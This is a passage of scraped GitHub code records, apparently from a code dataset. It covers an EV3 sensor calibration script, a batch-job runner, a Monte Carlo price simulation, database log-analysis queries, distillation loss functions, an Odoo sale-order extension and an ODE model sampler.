given port\"\n\n # creat the sensor object from the ColorSensor class\n sensor = ColorSensor(port)\n\n while True:\n # have four different ways of using this\n # sensor!\n color = sensor.color()\n reflection = sensor.reflection()\n ambient = sensor.ambient()\n rgb = sensor.rgb()\n print(\"color: \", color)\n print(\"reflection: \", reflection)\n print(\"ambient: \", ambient)\n print(\"rgb: \", rgb)\n wait(1000)\n\ndef printMsg(msg):\n print(msg)\n brick.display.text(msg)\n\ndef getSensorValue(sensor):\n return sensor.reflection()\n # return sensor.ambient()\n\ndef calibrateLightSensor(port):\n sensor = ColorSensor(port)\n \n # first display values\n btns = brick.buttons()\n while len(btns) == 0:\n r = getSensorValue(sensor)\n printMsg(\"value on port %d: %f\" % (port, r))\n printMsg(\"press any key\")\n wait(10)\n btns = brick.buttons()\n\n \n printMsg(\"place over dark, then press any key\")\n wait(2000)\n btns = brick.buttons()\n while len(btns) == 0:\n r = getSensorValue(sensor)\n btns = brick.buttons()\n\n low = r\n printMsg(\"dark value is %f \" % low)\n printMsg(\"light, press any key\")\n wait(2000)\n btns = brick.buttons()\n \n while len(btns) == 0:\n r = getSensorValue(sensor)\n btns = brick.buttons()\n\n high = r\n 
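# the sensor reading captured when a button is pressed over the bright\n    # surface becomes the upper calibration bound\n    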
printMsg(\"highest value: %f\" % high)\n \n printMsg(\"calibrated values:\")\n wait(2000)\n btns = brick.buttons()\n while len(btns) == 0:\n r = getSensorValue(sensor)\n c = calibrateValue(r, low, high)\n btns = brick.buttons()\n printMsg(\"calibrated value: %f \" % c)\n wait(100)\n \n return low, high\n\ndef calibrateValue(value, low, high):\n height = high - low\n if height == 0:\n return 0.\n\n cal = (value / height) * 100.0\n cal = max(0., cal)\n cal = min(cal, 100.)\n\n return cal\n \n# display the light values in Port #2\n#port = Port.S2\n#displayLightValue(port)","repo_name":"pmargani/EV3Python","sub_path":"examples/lightSensor.py","file_name":"lightSensor.py","file_ext":"py","file_size_in_byte":3441,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"37126901039","text":"from __future__ import annotations\n\nimport time\nimport typing\n\nif typing.TYPE_CHECKING:\n from typing_extensions import Literal\n\n import polars as pl\n import toolcli\n import toolsql\n\nfrom . import spec\nfrom . import trackers\n\n\nclass Batch:\n name: str | None = None\n jobs: typing.Sequence[spec.JobData] | None = None\n\n #\n # # manadatory implementations\n #\n\n def execute_job(self, i: int) -> typing.Any:\n raise NotImplementedError()\n\n #\n # # __init__\n #\n\n def __init__(\n self,\n *,\n jobs: typing.Sequence[spec.JobData] | None = None,\n tracker: str | None = None,\n output_dir: str | None = None,\n output_filetype: str | None = None,\n outputs: spec.ShorthandOutputsSpec | None = None,\n db_config: toolsql.DBConfig | None = None,\n bucket_path: str | None = None,\n name: str | None = None,\n styles: toolcli.StyleTheme | None = None,\n verbose: bool = False,\n ) -> None:\n self.name = name\n self.jobs = jobs\n if styles is None:\n styles = {}\n self.styles = styles\n self.verbose = verbose\n self.tracker = trackers.create_tracker(\n tracker=tracker,\n output_dir=output_dir,\n output_filetype=output_filetype,\n outputs=outputs,\n db_config=db_config,\n bucket_path=bucket_path,\n batch=self,\n )\n\n #\n # # names\n #\n\n def get_job_list_name(self) -> str:\n if self.name is not None:\n return self.name\n else:\n return type(self).__name__\n\n def get_job_name(\n self,\n i: int | None = None,\n *,\n job_data: spec.JobData | None = None,\n parameters: typing.Mapping[str, str] | None = None,\n ) -> str:\n if job_data is None:\n if i is None:\n raise Exception('must specify job_data or i')\n job_data = self.get_job_data(i)\n\n if isinstance(job_data, (str, int, bool)):\n return self.get_job_list_name() + str(job_data)\n\n elif isinstance(job_data, dict):\n for key, value in job_data.items():\n if not isinstance(value, (str, int, bool)):\n raise NotImplementedError(\n 'must define job_name() for this type of job_data'\n )\n tokens = [\n key + '_' + job_data[key]\n for key, value in sorted(job_data.items())\n ]\n\n # add additional parameters to name\n if parameters is not None:\n for key, value in sorted(parameters.items()):\n tokens.append(key + '_' + value)\n\n return self.get_job_list_name() + '__'.join(tokens)\n\n else:\n raise NotImplementedError(\n 'must define get_job_name() for this type of job_data'\n )\n\n def parse_job_name(self, name: str) -> spec.JobData:\n job_data = {}\n for pair in name.split('__'):\n key, value = pair.split('_')\n job_data[key] = self._parse_name_token(value)\n return job_data\n\n @staticmethod\n def _parse_name_token(token: str) -> bool | int | str:\n try:\n return bool(token)\n except Exception:\n try:\n 
return int(token)\n except Exception:\n return token\n\n #\n # # job data\n #\n\n def get_n_jobs(self) -> int:\n if hasattr(self, 'jobs') and self.jobs is not None:\n return len(self.jobs)\n else:\n raise NotImplementedError(\n 'must specify jobs or implement get_n_jobs()'\n )\n\n def get_job_data(self, i: int) -> spec.JobData:\n if hasattr(self, 'jobs') and self.jobs is not None:\n return self.jobs[i]\n else:\n raise NotImplementedError(\n 'must specify jobs or implement get_job_data()'\n )\n\n #\n # # job completion\n #\n\n def get_remaining_jobs(self) -> typing.Sequence[int]:\n jobs = range(self.get_n_jobs())\n return [\n j\n for j, complete in enumerate(self.are_jobs_complete(jobs))\n if not complete\n ]\n\n def are_jobs_complete(\n self, indices: typing.Sequence[int]\n ) -> typing.Sequence[bool]:\n return [self.tracker.is_job_complete(i) for i in indices]\n\n #\n # # hashes\n #\n\n def get_job_hash(\n self, i: int | None = None, *, job_data: spec.JobData | None = None\n ) -> str:\n import hashlib\n import json\n\n if job_data is None:\n if i is None:\n raise Exception('must specify i or job_hash')\n job_data = self.get_job_data(i)\n job_data_str = json.dumps(job_data, sort_keys=True)\n job_hash = hashlib.md5(job_data_str.encode()).hexdigest()\n return job_hash\n\n def get_job_hashes(\n self,\n indices: typing.Sequence[int] | None = None,\n *,\n job_datas: typing.Sequence[typing.Any] | None = None,\n ) -> typing.Sequence[str]:\n if job_datas is None:\n if indices is None:\n indices = list(range(self.get_n_jobs()))\n job_datas = [self.get_job_data(i) for i in indices]\n return [self.get_job_hash(job_data) for job_data in job_datas]\n\n #\n # # execution\n #\n\n def orchestrate_jobs(\n self,\n executor: Literal['serial', 'parallel'] = 'parallel',\n n_processes: int | None = None,\n ) -> None:\n import tooltime\n\n self.print_status()\n\n # check whether to circuit break\n remaining_jobs = self.get_remaining_jobs()\n if len(remaining_jobs) == 0:\n print('\\nAll jobs already completed')\n return\n\n # print summary\n start_time = time.time()\n print()\n print()\n self.print_header('Running remaining jobs...')\n self.print_bullet(\n key='start time',\n value=tooltime.timestamp_to_iso_pretty(start_time),\n bullet_str='',\n )\n\n # execute jobs\n if executor == 'serial':\n self.serial_execute(jobs=remaining_jobs)\n elif executor == 'parallel':\n self.parallel_execute(jobs=remaining_jobs, n_processes=n_processes)\n else:\n raise Exception('unknown executor: ' + str(executor))\n\n # finalize\n self.print_conclusion(\n start_time=start_time,\n end_time=time.time(),\n jobs=remaining_jobs,\n )\n\n def serial_execute(self, jobs: typing.Sequence[int]) -> None:\n import tqdm\n\n color = self._get_progress_bar_color()\n for job in tqdm.tqdm(jobs, colour=color):\n self.run_job(job)\n\n def parallel_execute(\n self,\n jobs: typing.Sequence[int],\n n_processes: int | None = None,\n ) -> None:\n import concurrent.futures\n import tqdm\n\n color = self._get_progress_bar_color()\n with concurrent.futures.ProcessPoolExecutor(n_processes) as executor:\n futures = [executor.submit(self.run_job, i=job) for job in jobs]\n with tqdm.tqdm(total=len(jobs), colour=color) as pbar:\n for future in concurrent.futures.as_completed(futures):\n pbar.update(1)\n\n def _get_progress_bar_color(self) -> str | None:\n if self.styles is None:\n return None\n else:\n return self.styles.get('content')\n\n def run_job(self, i: int) -> None:\n self.start_job(i=i)\n self.execute_job(i=i)\n self.end_job(i=i)\n\n def start_job(self, 
i: int) -> None:\n pass\n\n def end_job(self, i: int) -> None:\n pass\n\n #\n # # times\n #\n\n def get_job_start_time(\n self, i: int | None = None, *, job_data: typing.Any | None = None\n ) -> int | float | None:\n raise NotImplementedError()\n\n def get_job_end_time(\n self, i: int | None = None, *, job_data: typing.Any | None = None\n ) -> int | float | None:\n raise NotImplementedError()\n\n def get_jobs_start_times(\n self,\n indices: typing.Sequence[int] | None = None,\n *,\n job_datas: typing.Sequence[typing.Any] | None = None,\n ) -> typing.Sequence[int | float | None]:\n if indices is not None:\n return [self.get_job_start_time(i=i) for i in indices]\n elif job_datas is not None:\n return [\n self.get_job_start_time(job_data=job_data)\n for job_data in job_datas\n ]\n else:\n raise Exception('must specify indices or job_datas')\n\n def get_jobs_end_times(\n self,\n indices: typing.Sequence[int] | None = None,\n *,\n job_datas: typing.Sequence[typing.Any] | None = None,\n ) -> typing.Sequence[int | float | None]:\n if indices is not None:\n return [self.get_job_end_time(i=i) for i in indices]\n elif job_datas is not None:\n return [\n self.get_job_end_time(job_data=job_data)\n for job_data in job_datas\n ]\n else:\n raise Exception('must specify indices or job_datas')\n\n #\n # # summary\n #\n\n def print_text_box(self, text: str) -> None:\n import toolstr\n\n toolstr.print_text_box(\n text,\n text_style=self.styles.get('metavar'),\n style=self.styles.get('content'),\n )\n\n def print_header(self, text: str) -> None:\n import toolstr\n\n toolstr.print_header(\n text,\n text_style=self.styles.get('metavar'),\n style=self.styles.get('content'),\n )\n\n def print_bullet(\n self, key: str, value: typing.Any, **kwargs: typing.Any\n ) -> None:\n import toolstr\n\n toolstr.print_bullet(key=key, value=value, styles=self.styles, **kwargs)\n\n def get_attribute_list(self) -> typing.Sequence[str]:\n attributes = list(vars(self).keys())\n if self.jobs is None:\n del attributes[attributes.index('jobs')]\n return attributes\n\n def get_formatted_attribute(self, key: str) -> str | None:\n return str(getattr(self, key))\n\n def print_status(self) -> None:\n import types\n import toolstr\n\n self.print_text_box('Collecting dataset ' + self.get_job_list_name())\n print()\n self.print_header('Parameters')\n self.print_bullet(key='n_jobs', value=self.get_n_jobs())\n toolstr.print_bullet(\n key='n_jobs_remaining',\n value=len(self.get_remaining_jobs()),\n )\n\n for obj, skip_keys in [\n (self, ['styles', 'tracker']),\n (self.tracker, ['batch']),\n ]:\n for parameter in obj.get_attribute_list(): # type: ignore\n if hasattr(obj, parameter):\n value = getattr(obj, parameter)\n else:\n value = None\n if (\n not parameter.startswith('_')\n and not isinstance(value, types.MethodType)\n and parameter not in skip_keys\n ):\n value_str = obj.get_formatted_attribute(parameter) # type: ignore\n if value_str is not None:\n self.print_bullet(key=parameter, value=value_str)\n\n self.print_additional_status()\n\n def print_additional_status(self) -> None:\n pass\n\n def print_conclusion(\n self,\n start_time: int | float,\n end_time: int | float,\n jobs: typing.Sequence[int],\n ) -> None:\n import toolstr\n import tooltime\n\n self.print_bullet(\n key='end time',\n value=' ' + tooltime.timestamp_to_iso_pretty(end_time),\n bullet_str='',\n )\n\n done_jobs = len([self.tracker.is_job_complete(i) for i in jobs])\n print()\n print(done_jobs, 'jobs completed')\n print()\n print()\n self.print_header('Execution 
Summary')\n\n duration = end_time - start_time\n seconds_per_job = duration / done_jobs\n jobs_per_second = done_jobs / duration\n jobs_per_minute = jobs_per_second * 60\n jobs_per_day = jobs_per_second * 86400\n self.print_bullet(\n 'duration',\n toolstr.format(duration, decimals=3) + ' seconds',\n )\n self.print_bullet(\n 'seconds per job',\n toolstr.format(seconds_per_job, decimals=3),\n )\n self.print_bullet(\n 'jobs per minute', toolstr.format(jobs_per_minute, decimals=2),\n )\n self.print_bullet(\n 'jobs per hour',\n toolstr.format(jobs_per_second * 86400 / 24, decimals=2),\n )\n self.print_bullet(\n 'jobs per day', toolstr.format(jobs_per_day, decimals=2),\n )\n self.print_additional_conclusion(\n start_time=start_time, end_time=end_time, jobs=jobs\n )\n\n def print_additional_conclusion(\n self,\n start_time: int | float,\n end_time: int | float,\n jobs: typing.Sequence[int],\n ) -> None:\n pass\n\n def summarize_jobs_per_second(self, sample_time: int = 60) -> pl.DataFrame:\n import polars as pl\n\n names = [self.get_job_name(i) for i in range(self.get_n_jobs())]\n times = [self.get_job_end_time(i) for i in range(self.get_n_jobs())]\n df = pl.from_dict({'job': names, 'times': times})\n df = df.with_columns(\n (pl.col('times') / sample_time).cast(int).alias('sample')\n )\n df = df.with_columns(\n [\n pl.col('job'),\n pl.count().over('sample').alias('jobs_per_second')\n / sample_time,\n ]\n )\n return df[['job', 'jobs_per_second']]\n\n def summarize_total_time(self) -> float | None:\n raw_times = self.get_jobs_end_times(list(range(self.get_n_jobs())))\n times = [float(time) for time in raw_times if time is not None]\n if len(times) > 0:\n return max(times) - min(times)\n else:\n return None\n\n","repo_name":"sslivkoff/tooljob","sub_path":"tooljob/batch_class.py","file_name":"batch_class.py","file_ext":"py","file_size_in_byte":14245,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"42842672271","text":"# Import libraries\r\nimport pandas as pd\r\nfrom scipy.interpolate import interp1d\r\nimport random\r\n\r\n\r\n# - - - Import data - - - \r\ndf = pd.read_csv(\"data.csv\", index_col=0, parse_dates=True)\r\ndf.sort_index(inplace = True)\r\ndf = df.resample('30min').mean()\r\n\r\n\r\n#=======================================================================\r\n# MONTE CARLO SIMULATION\r\n#=======================================================================\r\n\r\n# Define function that performs Monte Carlo simulation\r\ndef rand_diff():\r\n '''Monte Carlo simulation of price difference on a single time\r\n period. 
It calculates the difference between randomly generated\r\n imbalance and day-ahead prices 10,000 times.\r\n \r\n Variables\r\n ----------\r\n f_imb, f_dam : interp1d\r\n Functions interpolated to the quantile forecasts of imbalance\r\n and day-ahead prices, respectively.\r\n \r\n Returns\r\n ----------\r\n df_diff : pandas.DataFrame\r\n One-column DataFrame with 10,000 rows.\r\n The column name corresponds to the time period.\r\n '''\r\n diff_rand = []\r\n for i in range(10000):\r\n y_diff = f_imb(random.uniform(0.05, 0.95)) - f_dam(random.uniform(0.05, 0.95))\r\n diff_rand.append(y_diff)\r\n df_diff = pd.DataFrame(diff_rand, columns=[y_dam.name])\r\n return (df_diff)\r\n\r\n\r\n# Day-ahead price forecast quantiles\r\ndf_dam = df[['lower90_dam', 'lower80_dam', 'lower50_dam', 'point_dam',\r\n 'upper50_dam', 'upper80_dam', 'upper90_dam']]\r\n\r\n# Imbalance price forecast quantiles\r\ndf_imb = df[['lower90_imb', 'lower80_imb', 'lower50_imb', 'point_imb', \r\n 'upper50_imb', 'upper80_imb', 'upper90_imb']]\r\n\r\n# List of corresponding probabilities\r\nx = [0.05, 0.10, 0.25, 0.50, 0.75, 0.90, 0.95]\r\n\r\n\r\n# Run Monte Carlo simulation on each time period in the test set\r\ndf_mc = pd.DataFrame()\r\nfor i in range(len(df_dam)):\r\n y_dam = df_dam.iloc[i]\r\n y_imb = df_imb.iloc[i]\r\n\r\n # Interpolate quadratic function to quantiles\r\n f_dam = interp1d(x, y_dam, kind='quadratic')\r\n f_imb = interp1d(x, y_imb, kind='quadratic')\r\n\r\n # Run Monte Carlo simulation\r\n df_mc = pd.concat([df_mc, rand_diff()], axis=1)\r\n\r\n\r\n#=======================================================================\r\n# DATA ANALYSIS\r\n#=======================================================================\r\n\r\n# - - - Descriptive statistics for each distribution - - -\r\nmc_prob = [(df_mc[col] > 0).sum()/float(len(df_mc[col]))\r\n for col in df_mc.columns] # probability of positive price difference\r\nmc_mean = [df_mc[col].mean() for col in df_mc.columns] # mean\r\nmc_median = [df_mc[col].median() for col in df_mc.columns] # median\r\nmc_std = [df_mc[col].std() for col in df_mc.columns] # std. 
dev.\r\n\r\n# 5, 10, 25, 75, 90, 95% quantiles\r\nmc_q05 = [df_mc[col].quantile(0.05) for col in df_mc.columns]\r\nmc_q10 = [df_mc[col].quantile(0.10) for col in df_mc.columns]\r\nmc_q25 = [df_mc[col].quantile(0.25) for col in df_mc.columns]\r\nmc_q75 = [df_mc[col].quantile(0.75) for col in df_mc.columns]\r\nmc_q90 = [df_mc[col].quantile(0.90) for col in df_mc.columns]\r\nmc_q95 = [df_mc[col].quantile(0.95) for col in df_mc.columns]\r\n\r\n\r\n# Store statistics in DataFrame \r\nmc_res = pd.DataFrame({'prob_positive':mc_prob, 'mc_mean':mc_mean,\r\n 'mc_median':mc_median, 'mc_std':mc_std,\r\n 'q05':mc_q05, 'q10':mc_q10, 'q25':mc_q25,\r\n 'q75':mc_q75, 'q90':mc_q90, 'q95':mc_q95\r\n },\r\n index = df.index)\r\n","repo_name":"ggoretti/phd-thesis","sub_path":"Electricity Price Forecasting/Monte_Carlo.py","file_name":"Monte_Carlo.py","file_ext":"py","file_size_in_byte":3547,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"96"} +{"seq_id":"17781193113","text":"import numpy as np\nfrom tensorflow import keras\n\n\ndef fetch_mnist_digit(ndim):\n # Load the data and split it between train and test sets\n (x_train, y_train), (x_test, y_test) = keras.datasets.mnist.load_data()\n\n # Scale images to the [0, 1] range\n # x_train = x_train.astype(\"float32\") / 255\n # x_test = x_test.astype(\"float32\") / 255\n # Make sure images have shape (28, 28, 1)\n x_train = x_train.reshape(x_train.shape[0], ndim, ndim, 1).astype(\"float32\") / 255.0\n x_test = x_test.reshape(x_test.shape[0], ndim, ndim, 1).astype(\"float32\") / 255.0\n print(\"x_train shape:\", x_train.shape)\n print(x_train.shape[0], \"train samples\")\n print(x_test.shape[0], \"test samples\")\n\n return (x_train, y_train), (x_test, y_test)\n","repo_name":"rkhosroshahli/ssl-vae","sub_path":"fetch_data.py","file_name":"fetch_data.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"70594324155","text":"#! /usr/bin/env python\nimport psycopg2\n\nDBNAME = \"news\"\n\n\n''' 1. What are the most popular three articles of all time? '''\n\n\ndef most_article():\n \"\"\" This function uses the tables article and log\n to return the most accessed articles \"\"\"\n\n db = psycopg2.connect(database=DBNAME)\n c = db.cursor()\n c.execute(\"\"\"\n SELECT articles.title, count(log.path) AS views\n FROM articles, log\n WHERE log.path = '/article/' || articles.slug\n GROUP BY articles.title\n ORDER BY VIEWs DESC LIMIT 3\n \"\"\")\n rows = c.fetchall()\n\n print(\"***The most popular three articles of all time***\")\n for title, views in rows:\n print('\"{}\" - {} views'.format(title, views))\n print(\" \\n \")\n\n db.close()\n\n\n'''2. Who are the most popular article authors of all time? '''\n\n\ndef most_authors():\n \"\"\" This function uses the tables article, authors and log\n to return the most accessed article authors based on article VIEWs\"\"\"\n\n db = psycopg2.connect(database=DBNAME)\n c = db.cursor()\n c.execute(\"\"\"\n SELECT authors.name, count(log.path) AS views\n FROM authors, log, articles\n WHERE log.path = '/article/' || articles.slug\n AND articles.author = authors.id\n GROUP BY authors.name\n ORDER BY views DESC;\n \"\"\")\n rows = c.fetchall()\n\n print(\"***The most popular article authors of all time***\")\n for name, views in rows:\n print('{} - {} views'.format(name, views))\n print(\" \\n \")\n\n db.close()\n\n\n'''3. On which days did more than 1% of requests lead to errors? 
'''\n\n\ndef percent_errors():\n \"\"\" It retuns the day with more than 1% requests errors \"\"\"\n\n db = psycopg2.connect(database=DBNAME)\n c = db.cursor()\n\n c.execute(\"\"\"\n CREATE VIEW access AS SELECT date(time) AS tdate,\n count(*) AS views\n FROM log\n GROUP BY date(time)\n ORDER BY date(time);\n \"\"\")\n c.execute(\"\"\"\n CREATE VIEW lerrors AS SELECT date(time) AS edate,\n count(*) AS errors\n FROM log\n WHERE status LIKE '%4%'\n GROUP BY time::date\n ORDER BY date(time);\n \"\"\")\n c.execute(\"\"\"\n CREATE VIEW percent as\n SELECT lerrors.edate,\n cast(errors * 100 AS double precision) / views AS p\n FROM access, lerrors\n WHERE access.tdate = lerrors.edate;\n \"\"\")\n\n c.execute(\"SELECT * FROM percent WHERE p > 1 \")\n rows = c.fetchall()\n\n print(\"***Days with more than 1% requests errors***\")\n for row in rows:\n print('{0:%B %d, %Y} - {1:.2f}% errors'.format(row[0], row[1]))\n print(\" \\n \")\n\n db.close()\n\n\nif __name__ == \"__main__\":\n \"\"\" Call the three functions and show the results \"\"\"\n\n most_article()\n most_authors()\n percent_errors()\n","repo_name":"cristianacmc/Log-Analysis","sub_path":"reporting.py","file_name":"reporting.py","file_ext":"py","file_size_in_byte":2788,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"20262164022","text":"import os\nimport sys\nsys.path.append(os.path.join(os.path.dirname(__file__), \"../../../\"))\nimport unittest\nimport pandas as pd\nfrom karura.core.dataframe_extension import DataFrameExtension\nfrom karura.core.insights.na_frequency_insight import NAFrequencyCheckInsight\n\n\nclass TestNAFrequencyInsight(unittest.TestCase):\n\n def test_insight(self):\n d = {\n \"category\": pd.Series([\"a\", \"b\", \"c\", \"b\", \"c\", \"a\", \"a\", \"b\"]),\n \"with_50_na\": pd.Series([\"a\", None, \"c\", None, None, None, \"a\", \"b\"]),\n \"with_20_na\": pd.Series([\"a\", \"b\", \"c\", \"b\", None, \"a\", None, \"b\"])\n }\n df = pd.DataFrame(d)\n dfe = DataFrameExtension(df)\n\n insight = NAFrequencyCheckInsight()\n self.assertTrue(insight.is_applicable(dfe))\n insight.init_description()\n\n insight.adopt(dfe)\n self.assertEqual(len(dfe.df.columns), 2)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n\n\n","repo_name":"chakki-works/karura","sub_path":"tests/karura_test/insights/test_na_frequency_insight.py","file_name":"test_na_frequency_insight.py","file_ext":"py","file_size_in_byte":938,"program_lang":"python","lang":"en","doc_type":"code","stars":71,"dataset":"github-code","pt":"96"} +{"seq_id":"28312962700","text":"import csv\n\nwordfrequencies = {}\n\nwith open('/media/echobot/Volume/home/simon/uni/masterarbeit/data/de/corpus/news.2013.de.shuffled.corpus.bigram') as f:\n print(\"Reading corpus and counting words...\")\n num_lines = 36218033;\n current_line = 1;\n for line in f:\n if current_line % 100000 == 0:\n print(\"Line %d / %d\" % (current_line, num_lines))\n words = line.split();\n for word in words:\n if not wordfrequencies.has_key(word):\n wordfrequencies[word] = 0;\n\n wordfrequencies[word] += 1\n current_line += 1\n\nprint(\"Saving word frequencies...\")\nwith open('wordfrequencies_bigrams.csv', 'wb') as csv_file:\n writer = csv.writer(csv_file)\n for key, value in wordfrequencies.items():\n writer.writerow([key, 
value])\n\n\n\n\n\n\n\n","repo_name":"obiwan87/master-thesis","sub_path":"python/echolex/prototyping/calculate_word_frequency.py","file_name":"calculate_word_frequency.py","file_ext":"py","file_size_in_byte":811,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"71933562877","text":"import torch\nfrom torch.nn import functional as F\nfrom torch import nn\n\n\nclass HintonCrossEntropyLoss(nn.Module):\n def __init__(self, teacher: nn.Module, ratio: float = 1.0, temperature: float = 1.0, reduction: str = 'mean'):\n super(HintonCrossEntropyLoss, self).__init__()\n\n self.ratio = ratio\n self.temperature = temperature\n assert reduction in ('mean', 'sum', 'none')\n self.reduction = reduction\n\n self.add_module('teacher', teacher)\n\n teacher.eval()\n\n def forward(self, x: torch.Tensor, y_pred: torch.Tensor, y: torch.Tensor) -> torch.Tensor:\n children = dict(self.named_children())\n num_classes = y_pred.shape[-1]\n\n with torch.no_grad():\n y_soft: torch.Tensor = children['teacher'](x)\n\n y_pred_t = (y_pred / self.temperature).softmax(-1)\n y_pred = y_pred.softmax(-1)\n y = F.one_hot(y, num_classes)\n y_soft_t = (y_soft / self.temperature).softmax(-1)\n\n return self._cross_entropy(y, y_pred) + self.ratio * self._cross_entropy(y_soft_t, y_pred_t)\n\n def _cross_entropy(self, y: torch.Tensor, y_pred: torch.Tensor):\n raw = -(y * y_pred.log()).sum(-1)\n if self.reduction == 'mean':\n return raw.mean()\n elif self.reduction == 'sum':\n return raw.sum()\n else:\n return raw\n\n\nclass LogitsDistillingLoss(HintonCrossEntropyLoss):\n \"\"\"\n The loss function to distill logits in SKD.\n \"\"\"\n def __init__(self, teacher, **kwargs):\n \"\"\"\n Initialize an instance of logits distilling loss.\n\n :param teacher: teacher model to provide soft target\n \"\"\"\n super(LogitsDistillingLoss, self).__init__(teacher)\n\n self.hardness_factor = 1 if 'hardness_factor' not in kwargs else kwargs[\n 'hardness_factor']\n\n def forward(self, x: torch.Tensor, y_pred: torch.Tensor, y: torch.Tensor) -> torch.Tensor:\n children = dict(self.named_children())\n num_classes = y_pred.shape[-1]\n\n with torch.no_grad():\n y_soft: torch.Tensor = children['teacher'](x)\n\n y_pred = (y_pred / y_pred.norm(dim=-1, keepdim=True)).softmax(-1)\n y_hard = F.one_hot(y, num_classes).type(torch.float32)\n y_soft = (y_soft / y_soft.norm(dim=-1, keepdim=True)).softmax(-1)\n\n y_soft[y_soft.argmax(\n dim=-1) != y] = y_hard[y_soft.argmax(dim=-1) != y] * self.hardness_factor\n y_soft = y_soft.softmax(dim=-1)\n y_pred = y_pred.softmax(dim=-1)\n y_hard[y_hard > 0.5] = 1.0 / self.temperature\n y_hard[y_hard < 0.5] = 1.0 - 1.0 / self.temperature\n\n return self._cross_entropy(y_hard, y_pred) + self.ratio * self._cross_entropy(y_soft, y_pred)\n","repo_name":"chenrz925/SMLDist","sub_path":"tasnem_har/models/loss_functions.py","file_name":"loss_functions.py","file_ext":"py","file_size_in_byte":2731,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"96"} +{"seq_id":"71294793597","text":"from odoo import api, fields, models, _\nfrom odoo.tools.misc import formatLang\nimport time\nfrom odoo.exceptions import UserError\n\n\nclass sale_order(models.Model):\n _inherit = \"sale.order\"\n\n is_manual_amount = fields.Boolean(string='Manual Amount',default=False)\n\n new_amount_untaxed = fields.Float(string='New Amount Untaxed')\n new_amount_tax = fields.Float(string='New Amount Tax')\n new_amount_total = fields.Float(string='New Amount Total')\n\n 
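# the new_amount_* fields hold manually entered totals; apply_price() below\n    # copies them over the computed amount_untaxed / amount_tax / amount_total\n    # whenever is_manual_amount is set\n    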
@api.multi\n def button_global_discount(self):\n res = super(sale_order, self).button_global_discount()\n if self.is_manual_amount:\n self.apply_price()\n # print ('-8zzzzzzzz')\n return res\n\n @api.multi\n def action_confirm(self):\n # print ('-bbbbbbbbbb')\n super(sale_order,self).action_confirm()\n if self.is_manual_amount:\n self.apply_price()\n # print ('---7yyyyyyyyyy')\n return True\n\n @api.multi\n def apply_price(self):\n\n if self.new_amount_untaxed:\n self.amount_untaxed = self.new_amount_untaxed\n if self.new_amount_tax:\n self.amount_tax = self.new_amount_tax\n if self.new_amount_total:\n self.amount_total = self.new_amount_total\n # print ('------apply price')\n # @api.multi\n # def action_done(self):\n # res = super(stock_picking,self).action_done()\n # if self.picking_type_id.new_sequence_id:\n # self.picking_number = self.picking_type_id.sudo().new_sequence_id.next_by_id()\n # return res\n\n\n","repo_name":"support-itaas/app_shop","sub_path":"manual_untax_tax_amount/models/sale_order.py","file_name":"sale_order.py","file_ext":"py","file_size_in_byte":1551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"3473233801","text":"import numpy as np\nfrom advectionGP.sensors import FixedSensorModel \nfrom advectionGP.kernels import EQ \nfrom advectionGP.constraints import NonNegConstraint\nfrom advectionGP.models.mesh_1d_ode_model import AdjointSecondOrderODEModel as ODEModel\nfrom advectionGP.kernels import meshgridndim\n\nclass ODEModelSample():\n def __init__(self,ls=1,non_neg=False,N_feat=200,k_0=0.001,u=0.001,eta=0.001,Npoints=10,shift=0,source=None):\n \"\"\"\n Generates a sample from our ODE model (with different hyperparameters). Option available to restrict it to non-negative samples\n - non_neg = False (default): sample from our standard ODE model\n - = True: sample from the non-negative prior\n - = 'softplus' sample from our standard ODE model, but then softplus the source to make it non-negative\n The shift parameter shifts the synthetic source up/down before applying the softplus function\n \"\"\"\n tlocL = np.linspace(1,19,Npoints) \n X= np.zeros((len(tlocL),2)) \n\n X[:,0] = tlocL\n X[:,1] = X[:,0]+0.1\n\n sensors = FixedSensorModel(X,0.1) # establish sensor model arguments are sensor locations and spatial averaging\n \n boundary = ([0],[20])# edges of the grid - in units of time\n k = EQ(ls, 2.0) # generate EQ kernel arguments are lengthscale and variance\n res = [400] # grid size for time, x and y\n m = ODEModel(resolution=res,boundary=boundary,N_feat=N_feat,noiseSD=0.1,kernel=k,sensormodel=sensors,k_0=k_0,u=u,eta=eta)\n if source is None:\n if non_neg=='softplus':\n #from https://stackoverflow.com/a/51828104\n def softplus(x): return np.log1p(np.exp(-np.abs(x))) + np.maximum(x, 0)\n z = np.random.randn(N_feat)\n source=m.computeSourceFromPhi(z)+shift # Compute source\n source = softplus(source*2)/2\n \n else:\n if non_neg:\n m.computeModelRegressors()\n Xnonneg = meshgridndim(m.boundary,200,False)\n nnc = NonNegConstraint(m,np.array([[]]),Xnonneg,thinning=2,burnin=20,jitter=0.002,verbose=True,meanZ = np.zeros(N_feat),covZ = np.eye(N_feat),startpointnormalised=True)\n Zs_nonneg = nnc.sample(1)\n z = Zs_nonneg[0,:]\n else:\n z = np.random.randn(N_feat) \n\n source=(m.computeSourceFromPhi(z))# Compute source\n \n conc=m.computeResponse(source) # Compute concentration - runs advection diffusion forward model\n Y= m.computeObservations(addNoise=True) # Compute observations with noise uses m.sensormodel for 
